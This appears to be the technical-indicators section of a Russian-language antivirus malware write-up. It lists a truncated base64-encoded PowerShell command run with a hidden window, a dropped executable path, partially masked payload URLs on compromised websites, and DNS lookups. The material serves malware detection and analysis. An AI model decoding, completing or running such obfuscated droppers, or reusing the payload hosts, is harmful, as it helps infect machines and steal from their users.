Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHMAcgBwAHcAaQB4AD0AKAAoACcATwBwACcAKwAnAGoAdAAnACkAKwAnAHMAcQAnACsAJwB5ACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBQAHIATwBmAEkAbABlAFwAVQAzAFMARgA4AF...
- %HOMEPATH%\u3sf8zg\ty9leb4\ihl1j0.exe
- %HOMEPATH%\u3sf8zg\ty9leb4\ihl1j0.exe
- http://an####cardozo.com/programas/k/
- http://ba##e.net/mariola/MW/
- http://as####acaomda.org/erros/R4t/
- http://pa###ythou.gr/wp-includes/2/
- DNS ASK si###gps.com
- DNS ASK an####cardozo.com
- DNS ASK ba##e.net
- DNS ASK ma#######sessoriadigital.com
- DNS ASK as####acaomda.org
- DNS ASK pa###ythou.gr
- DNS ASK ve##x.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHMAcgBwAHcAaQB4AD0AKAAoACcATwBwACcAKwAnAGoAdAAnACkAKwAnAHMAcQAnACsAJwB5ACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBQAHIATwBmAEkAbABlAFwAVQAzAFMARgA4AF...' (со скрытым окном)